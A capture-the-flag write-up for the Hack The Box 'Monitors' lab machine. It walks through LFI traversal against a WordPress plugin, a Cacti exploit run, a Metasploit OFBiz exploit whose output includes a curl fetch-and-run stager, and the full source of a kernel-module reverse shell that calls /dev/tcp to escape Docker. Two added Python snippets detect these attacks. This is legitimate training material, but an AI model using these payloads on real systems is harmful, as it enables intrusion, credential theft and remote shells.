Welcome to the Monitors writeup from HTB.
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Monitors
tags: HTB, Hard, Linux
Platform: Hackthebox
Difficulty: Hard
OS: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.238
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 13:43 EDT
Nmap scan report for 10.10.10.238
Host is up (0.048s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 55.04 seconds
Now that we know the open ports, let's scan them in depth.
$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p22,80 10.10.10.238
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 13:45 EDT
Nmap scan report for 10.10.10.238
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
| 256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_ 256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn´t have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.47 seconds
When we browse to the web server on port 80 we see that access is restricted, and the page tells us to contact admin@monitors.htb. If we add the monitors.htb hostname to our hosts file we can reach the website at http://monitors.htb/.
Sorry, direct IP access is not allowed.
If you are having issues accessing the site then contact the website administrator: admin@monitors.htb
WPScan
$ wpscan --url http://monitors.htb/ -e ap,u,cb
[i] Plugin(s) Identified:
[+] wp-with-spritz
| Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
| Latest Version: 1.0 (up to date)
| Last Updated: 2015-08-20T20:15:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 4.2.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt
Searching for known vulnerabilities in this plugin version, we find an LFI / RFI described in this link.
Exploitation
Using the URL http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd we can read the contents of /etc/passwd.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
Debian-snmp:x:112:115::/var/lib/snmp:/bin/false
mysql:x:109:114:MySQL Server,,,:/nonexistent:/bin/false
Taking advantage of the LFI we can read the WordPress wp-config.php file to look for the MySQL credentials.
view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php
[...]
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
Looking inside http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/apache2/sites-enabled/000-default.conf we find another domain name, cacti-admin.monitors.htb.
# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf
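As an added defensive example (not part of the original writeup), here is a small Python detector for the traversal and remote-URL patterns used above against wp.spritz.content.filter.php, run over constructed Apache access-log lines:

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not captured from the box): two LFI
# attempts against the spritz filter script (one percent-encoded), one RFI
# attempt with a remote URL, and one benign request that must not be flagged.
SAMPLE_LOG = r'''
10.10.14.29 - - [24/Jul/2021:13:50:01 -0400] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.10.14.29 - - [24/Jul/2021:13:51:12 -0400] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
10.10.14.29 - - [24/Jul/2021:13:52:30 -0400] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http://10.10.14.29/x.txt HTTP/1.1" 200 40 "-" "curl/7.74.0"
10.10.14.29 - - [24/Jul/2021:13:53:00 -0400] "GET /index.php HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
'''.strip()

# Apache combined log: client IP, timestamp, and the request target are enough here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SPRITZ_SCRIPT = "wp.spritz.content.filter.php"

def classify_spritz_request(target):
    """Return 'LFI', 'RFI' or None for one request target (path plus query)."""
    parts = urlsplit(target)
    if not parts.path.endswith(SPRITZ_SCRIPT):
        return None
    for raw in parse_qs(parts.query).get("url", []):
        value = unquote(raw)  # parse_qs decoded once; decode again to catch double-encoding
        if re.match(r"^[a-z][a-z0-9+.-]*://", value, re.I):
            return "RFI"          # a scheme means the plugin would fetch a remote file
        if "../" in value or "..\\" in value or value.startswith("/"):
            return "LFI"          # traversal or an absolute local path
    return None

def find_spritz_abuse(log_text):
    """Return (ip, timestamp, kind, target) for every suspicious request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify_spritz_request(m["target"])
        if kind:
            hits.append((m["ip"], m["ts"], kind, m["target"]))
    return hits

if __name__ == "__main__":
    for hit in find_spritz_abuse(SAMPLE_LOG):
        print("%s %s %s %s" % hit)
```

On a real server, feed it the Apache access log; any hit is a request the plugin should never have received.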
On this domain we find a login form. We can log in with the credentials admin:BestAdministrator@2020!.
Now we can use this exploit to get a shell. We start a listener in one terminal and run the exploit.
$ python3 exploit.py -t http://cacti-admin.monitors.htb -u admin -p 'BestAdministrator@2020!' --lhost 10.10.14.29 --lport 8787
[+] Connecting to the server...
[+] Retrieving CSRF token...
[+] Got CSRF token: sid:ac3fbf8f5163e68c4ded3c22646f2ca5a6c3961b,1627157074
[+] Trying to log in...
[+] Successfully logged in!
[+] SQL Injection:
"name","hex"
"",""
"admin","$2y$10$TycpbAes3hYvzsbRxUEbc.dTqT0MdgVipJNBYu8b7rUlmB8zn8JwK"
"guest","43e9a4ab75570f5b"
[+] Check your nc listener!
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.238] 36118
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Post exploitation: www-data to marcus
Enumeration
Now, searching the filesystem for the subdomain name cacti, we find more credentials.
www-data@monitors:/$ find / -name "cacti*" 2>/dev/null
[...]
/etc/systemd/system/cacti-backup.service
[...]
www-data@monitors:/$ cat /etc/systemd/system/cacti-backup.service
[...]
ExecStart=/home/marcus/.backup/backup.sh
[...]
www-data@monitors:/home/marcus/.backup$ cat /home/marcus/.backup/backup.sh
#!/bin/bash
backup_name="cacti_backup"
config_pass="VerticalEdge2020"
zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip
Now we only need to run su marcus with the password VerticalEdge2020 and read the user flag.
www-data@monitors:/home/marcus/.backup$ su marcus
Password:
marcus@monitors:~/.backup$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
marcus@monitors:~/.backup$ cd
marcus@monitors:~$ cat user.txt
CENSORED_FLAG
marcus@monitors:~$
Post exploitation: marcus to root
Enumeration
Looking at the output of netstat we see that port 8443 is listening only on localhost.
marcus@monitors:~$ netstat -putona
[...]
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN - off (0.00/0/0)
[...]
We forward this port to our machine with SSH local port forwarding.
$ ssh -L localhost:8443:localhost:8443 marcus@monitors.htb
Accessing port 8443 over HTTPS, a Tomcat error page appears that reveals the version, Tomcat 9.0.31. Googling that version we find this vulnerability.
msf6 > use exploit/linux/http/apache_ofbiz_deserialization
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set rhosts 127.0.0.1
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lhost 10.10.14.29
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lport 8888
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set forceexploit true
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > show options
Module options (exploit/linux/http/apache_ofbiz_deserialiation):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.29 yes The listen address (an interface may be specified)
LPORT 8888 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux Dropper
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > run
[*] Started reverse TCP handler on 10.10.14.29:8888
[*] Executing automatic check (disable AutoCheck to override)
[!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
[*] Executing Linux Dropper for linux/x86/shell/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/re6R4gMz4969w
[*] Local IP: http://23.6.17.150:8080/re6R4gMz4969w
[+] Successfully executed command: sh -c curl${IFS}-so${IFS}/tmp/RXsgDGlc${IFS}http://10.10.14.29:8080/re6R4gMz4969w;chmod${IFS}+x${IFS}/tmp/RXsgDGlc;/tmp/RXsgDGlc;rm${IFS}-f${IFS}/tmp/RXsgDGlc
[*] Client 10.10.10.238 (curl/7.64.0) requested /re6R4gMz4969w
[*] Sending payload to 10.10.10.238 (curl/7.64.0)
[*] Command Stager progress - 103.95% done (158/152 bytes)
[*] Sending stage (36 bytes) to 10.10.10.238
[*] Command shell session 1 opened (10.10.14.29:8888 -> 10.10.10.238:41252) at 2021-07-25 18:54:45 +0200
[*] Server stopped.
id
uid=0(root) gid=0(root) groups=0(root)
And we are root, but inside a Docker container. If we list the capabilities with capsh --print we can see that cap_sys_module is available.
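As an added defensive check (not part of the original writeup), this Python snippet decodes the CapEff mask from /proc/<pid>/status and reports capabilities that let a container root reach the host, cap_sys_module among them; the two status dumps are constructed, and the capability numbers are the kernel's:

```python
# Capability names indexed by kernel capability number (bit n of CapEff).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner", "cap_fsetid",
    "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap", "cap_linux_immutable",
    "cap_net_bind_service", "cap_net_broadcast", "cap_net_admin", "cap_net_raw",
    "cap_ipc_lock", "cap_ipc_owner", "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot",
    "cap_sys_ptrace", "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod", "cap_lease",
    "cap_audit_write", "cap_audit_control", "cap_setfcap", "cap_mac_override",
    "cap_mac_admin", "cap_syslog", "cap_wake_alarm", "cap_block_suspend", "cap_audit_read",
    "cap_perfmon", "cap_bpf", "cap_checkpoint_restore",
]
# Capabilities that on their own give a container root a path to the host kernel or
# host filesystem; cap_sys_module is the one abused in this writeup.
ESCAPE_CAPS = {"cap_sys_module", "cap_sys_admin", "cap_sys_ptrace",
               "cap_sys_rawio", "cap_dac_read_search"}

def decode_caps(mask):
    """Turn a CapEff bitmask into the set of capability names it contains."""
    names = set()
    for bit in range(64):
        if mask >> bit & 1:
            names.add(CAP_NAMES[bit] if bit < len(CAP_NAMES) else "cap_%d" % bit)
    return names

def effective_caps(status_text):
    """Parse the CapEff line of a /proc/<pid>/status dump."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return decode_caps(int(line.split()[1], 16))
    raise ValueError("no CapEff line in status text")

def escape_risk(status_text):
    """Sorted list of escape-relevant capabilities present in the dump."""
    return sorted(effective_caps(status_text) & ESCAPE_CAPS)

# Constructed samples: Docker's default capability set (a80425fb) and the same
# set with bit 16, CAP_SYS_MODULE, added, as on the Monitors container.
DEFAULT_STATUS = "Name:\tbash\nCapEff:\t00000000a80425fb\n"
SYS_MODULE_STATUS = "Name:\tbash\nCapEff:\t00000000a80525fb\n"

if __name__ == "__main__":
    with open("/proc/self/status") as f:
        print(escape_risk(f.read()))
```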
Searching the internet we find this PoC, which lets us escape the container and become root on the host.
reverse-shell.c
#include <linux/kmod.h>
#include <linux/module.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

/* Command executed in user space on the host once the module is loaded */
char* argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.14.29/8787 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};

// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
Makefile
obj-m += reverse-shell.o

all:
	make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modules

clean:
	make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean
root@fb6c348eae64:/# make
make -C /lib/modules/4.15.0-142-generic/build M=/ modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
CC [M] //reverse-shell.o
Building modules, stage 2.
MODPOST 1 modules
CC /reverse-shell.mod.o
LD [M] /reverse-shell.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
We start our listener and load the module.
root@fb6c348eae64:/# insmod reverse-shell.ko
And now we are root on the host and can read the root flag!
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.238] 49874
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@monitors:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@monitors:/# cat /root/root.txt
cat /root/root.txt
CENSORED_FLAG